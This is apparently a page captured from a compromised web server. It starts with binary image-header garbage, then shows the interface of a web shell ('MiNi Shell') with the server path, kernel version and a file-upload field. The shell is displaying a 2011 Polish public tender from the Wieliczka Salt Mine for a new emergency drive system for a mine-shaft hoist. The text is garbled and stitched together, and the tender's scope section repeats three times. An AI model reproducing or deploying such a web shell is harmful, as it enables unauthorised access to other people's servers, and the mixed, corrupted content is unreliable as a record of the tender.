JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111129/312199-N-2011.html

<p class="kh_header"><b>Wieliczka: Wykonanie nowego układu napędowego, współpracującego z przekładnią główną, dla jazdy awaryjnej maszyny wyciągowej górniczego wyciągu szybowego szybu Daniłowicz wraz z wykonaniem dokumentacji technicznej i uruchomieniem dla Kopalni Soli Wieliczka S.A.</b><br>
<b>Numer ogłoszenia: 312199 - 2011; data zamieszczenia: 29.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 012 278711, 012 2787132, faks 012 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Górnictwo Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie nowego układu napędowego, współpracującego z przekładnią główną, dla jazdy awaryjnej maszyny wyciągowej górniczego wyciągu szybowego szybu Daniłowicz wraz z wykonaniem dokumentacji technicznej i uruchomieniem dla Kopalni Soli Wieliczka S.A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest realizacja za wynagrodzeniem następujących prac:
1)wykonanie nowego układu napędowego, współpracującego z przekładnią główną, dla jazdy awaryjnej maszyny wyciągowej górniczego wyciągu szybowego szybu Daniłowicz, zwanego dalej Układem napędowym,
2)demontaż dotychczas eksploatowanego układu napędowego, współpracującego z przekładnią główną, dla jazdy awaryjnej maszyny wyciągowej górniczego wyciągu szybowego szybu Daniłowicz,
3)montaż, uruchomienie i oddanie do ruchu Układu napędowego.
2.Realizacja przedmiotu zamówienia obejmuje:
1)wykonanie wszelkich usług niezbędnych do prawidłowego wykonania przedmiotu zamówienia,
2)zakup i dostawę materiałów niezbędnych do prawidłowego wykonania przedmiotu zamówienia.
3.W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany do:
1)sporządzenia dokumentacji technicznej projektowej Układu napędowego,
2)sporządzenia technologii wykonywania robót,
3)przejęcia placu robót,
4)zorganizowania placu robót,
5)zastosowania do realizacji przedmiotu zamówienia wyrobów posiadających dopuszczenie do stosowania w zakładach górniczych, wydane w drodze decyzji przez Prezesa Wyższego Urzędu Górniczego zgodnie z art. 111 ustawy z dnia 4 lutego 1994 r. Prawo geologiczne i górnicze (jednolity tekst: Dz. U. 2005 r. Nr 228 poz. 1947 ze zm.), jeżeli taki wymóg wynika z rozporządzenia Rady Ministrów 
z dnia 30 kwietnia 2004 r. w sprawie dopuszczania wyrobów do stosowania w zakładach górniczych (Dz. U. z 2004 r. Nr 99 poz. 1003 ze zm.),
6)uczestniczenia w procedurze uzyskiwania przez Zamawiającego zezwolenia na oddanie Układu napędowego do ruchu wydawanego przez właściwego Dyrektora Urzędu Górniczego do Badań Kontrolnych Urządzeń Energomechanicznych 
na podstawie § 30 rozporządzenia Ministra Gospodarki z dnia 28 czerwca 2002 r. w sprawie bezpieczeństwa i higieny pracy, prowadzenia ruchu oraz specjalistycznego zabezpieczenia przeciwpożarowego w podziemnych zakładach górniczych (Dz. U. 
z 2002 r. Nr 139 poz. 1169 ze zm.),
7)rozruchu Układu napędowego,
8)nadzoru nad ruchem próbnym Układu napędowego
9)sporządzenia dokumentacji powykonawczej zrealizowanych prac,
10)przeprowadzenia szkoleń,
11)zapewnienia maszyn i urządzeń niezbędnych do wykonania robót,
12)zapewnienia osób posiadających odpowiednie uprawnienia i kwalifikacje do nadzoru nad prowadzonymi robotami.
1.	Przedmiotem zamówienia jest realizacja za wynagrodzeniem następujących prac:
1)	wykonanie nowego układu napędowego, współpracującego z przekładnią główną, dla jazdy awaryjnej maszyny wyciągowej górniczego wyciągu szybowego szybu Daniłowicz, zwanego dalej Układem napędowym,
2)	demontaż dotychczas eksploatowanego układu napędowego, współpracującego z przekładnią główną, dla jazdy awaryjnej maszyny wyciągowej górniczego wyciągu szybowego szybu Daniłowicz,
3)	montaż, uruchomienie i oddanie do ruchu Układu napędowego.


3.2.	Realizacja przedmiotu zamówienia obejmuje:
1)	wykonanie wszelkich usług niezbędnych do prawidłowego wykonania przedmiotu zamówienia,
2)	zakup i dostawę materiałów niezbędnych do prawidłowego wykonania przedmiotu zamówienia.
3.3.	W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany do:
1)	sporządzenia dokumentacji technicznej projektowej Układu napędowego,
2)	sporządzenia technologii wykonywania robót,
3)	przejęcia placu robót,
4)	zorganizowania placu robót,
5)	zastosowania do realizacji przedmiotu zamówienia wyrobów posiadających dopuszczenie do stosowania w zakładach górniczych, wydane w drodze decyzji przez Prezesa Wyższego Urzędu Górniczego zgodnie z art. 111 ustawy z dnia 4 lutego 1994 r. Prawo geologiczne i górnicze (jednolity tekst: Dz. U. 2005 r. Nr 228 poz. 1947 ze zm.), jeżeli taki wymóg wynika z rozporządzenia Rady Ministrów 
z dnia 30 kwietnia 2004 r. w sprawie dopuszczania wyrobów do stosowania w zakładach górniczych (Dz. U. z 2004 r. Nr 99 poz. 1003 ze zm.),
6)	uczestniczenia w procedurze uzyskiwania przez Zamawiającego zezwolenia na oddanie Układu napędowego do ruchu wydawanego przez właściwego Dyrektora Urzędu Górniczego do Badań Kontrolnych Urządzeń Energomechanicznych 
na podstawie § 30 rozporządzenia Ministra Gospodarki z dnia 28 czerwca 2002 r. w sprawie bezpieczeństwa i higieny pracy, prowadzenia ruchu oraz specjalistycznego zabezpieczenia przeciwpożarowego w podziemnych zakładach górniczych (Dz. U. 
z 2002 r. Nr 139 poz. 1169 ze zm.),
7)	rozruchu Układu napędowego,
8)	nadzoru nad ruchem próbnym Układu napędowego
9)	sporządzenia dokumentacji powykonawczej zrealizowanych prac,
10)	przeprowadzenia szkoleń,
11)	zapewnienia maszyn i urządzeń niezbędnych do wykonania robót,
12)	zapewnienia osób posiadających odpowiednie uprawnienia i kwalifikacje do nadzoru nad prowadzonymi robotami.

1.	Przedmiotem zamówienia jest realizacja za wynagrodzeniem następujących prac:
1)	wykonanie nowego układu napędowego, współpracującego z przekładnią główną, dla jazdy awaryjnej maszyny wyciągowej górniczego wyciągu szybowego szybu Daniłowicz, zwanego dalej Układem napędowym,
2)	demontaż dotychczas eksploatowanego układu napędowego, współpracującego z przekładnią główną, dla jazdy awaryjnej maszyny wyciągowej górniczego wyciągu szybowego szybu Daniłowicz,
3)	montaż, uruchomienie i oddanie do ruchu Układu napędowego.


3.2.	Realizacja przedmiotu zamówienia obejmuje:
1)	wykonanie wszelkich usług niezbędnych do prawidłowego wykonania przedmiotu zamówienia,
2)	zakup i dostawę materiałów niezbędnych do prawidłowego wykonania przedmiotu zamówienia.
3.3.	W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany do:
1)	sporządzenia dokumentacji technicznej projektowej Układu napędowego,
2)	sporządzenia technologii wykonywania robót,
3)	przejęcia placu robót,
4)	zorganizowania placu robót,
5)	zastosowania do realizacji przedmiotu zamówienia wyrobów posiadających dopuszczenie do stosowania w zakładach górniczych, wydane w drodze decyzji przez Prezesa Wyższego Urzędu Górniczego zgodnie z art. 111 ustawy z dnia 4 lutego 1994 r. Prawo geologiczne i górnicze (jednolity tekst: Dz. U. 2005 r. Nr 228 poz. 1947 ze zm.), jeżeli taki wymóg wynika z rozporządzenia Rady Ministrów 
z dnia 30 kwietnia 2004 r. w sprawie dopuszczania wyrobów do stosowania w zakładach górniczych (Dz. U. z 2004 r. Nr 99 poz. 1003 ze zm.),
6)	uczestniczenia w procedurze uzyskiwania przez Zamawiającego zezwolenia na oddanie Układu napędowego do ruchu wydawanego przez właściwego Dyrektora Urzędu Górniczego do Badań Kontrolnych Urządzeń Energomechanicznych 
na podstawie § 30 rozporządzenia Ministra Gospodarki z dnia 28 czerwca 2002 r. w sprawie bezpieczeństwa i higieny pracy, prowadzenia ruchu oraz specjalistycznego zabezpieczenia przeciwpożarowego w podziemnych zakładach górniczych (Dz. U. 
z 2002 r. Nr 139 poz. 1169 ze zm.),
7)	rozruchu Układu napędowego,
8)	nadzoru nad ruchem próbnym Układu napędowego
9)	sporządzenia dokumentacji powykonawczej zrealizowanych prac,
10)	przeprowadzenia szkoleń,
11)	zapewnienia maszyn i urządzeń niezbędnych do wykonania robót,
12)	zapewnienia osób posiadających odpowiednie uprawnienia i kwalifikacje do nadzoru nad prowadzonymi robotami.

Szczegółowe informacje dotyczące przedmiotu zamówienia znajdują się w SIWZ, zamieszczonej na stronie internetowej Kopalni Soli Wieliczka S.A..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 43.10.00.00-4, 51.54.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 3 000,00zł należy wnieść przed upływem terminu składania ofert określonym w części XII pkt.2 specyfikacji.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>to jest udokumentowania wykonania w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi, polegającej na wykonaniu robót  mających za przedmiot modernizację maszyny wyciągowej lub wykonanie nowej maszyny wyciągowej</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>to jest posiadania przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 100 000,00 zł (polisa a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z przepisem art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, dopuszcza się możliwość dokonania istotnych zmian postanowień umowy oraz załączników do umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie, o którym mowa w ust. 2, z wyłączeniem takich zmian, których dokonanie spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2.Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy oraz załączników do umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, wyłącznie 
w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1)	udzielenia Wykonawcy przez Zamawiającego zamówienia na wykonanie robót dodatkowych, w rozumieniu przepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
2)	kolizji prowadzonych przez Wykonawcę robót z planowanymi lub równolegle prowadzonymi przez Zamawiającego inwestycjami,
3)	przestojów i opóźnień w wykonywaniu przedmiotu umowy, zawinionych 
przez Zamawiającego,
4)	działania siły wyższej,
5)	zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
3.	Zaistnienie, którejkolwiek z przyczyn, wymienionych w ust. 1, nie powoduje powstania u żadnej ze stron niniejszej umowy, roszczenia o zmianę umowy.
4.	W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w ust. 1, każdej ze stron niniejszej umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę niniejszej umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1)	szczegółowy opis przyczyn uzasadniających zmianę umowy, 
2)	uzasadnienie dokonania zmiany umowy,
3)	projekt zmiany umowy.
5.	Wystąpienie, o którym mowa w ust. 3 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
6.	Zmiana umowy oraz załączników do umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
7.	Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
8.	Zmiana umowy zostaje zawarta w dniu jej podpisania przez obie strony.
9.	Przepisy zawarte w powyższych ustępach nie wykluczają dokonania nieistotnych zmian postanowień umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych. Dopuszczalne będą zatem zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania o udzielenie tego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Soli Wieliczka S.A. 32-020 Wieliczka Park Kingi 1 - budynek A Dział Zamówień Publicznych pokój nr A9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2011 godzina 11:30, miejsce: Kopalnia Soli Wieliczka S.A.  32-020 Wieliczka Park Kingi 1 - Sekretariat Zarządu budynek A   - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com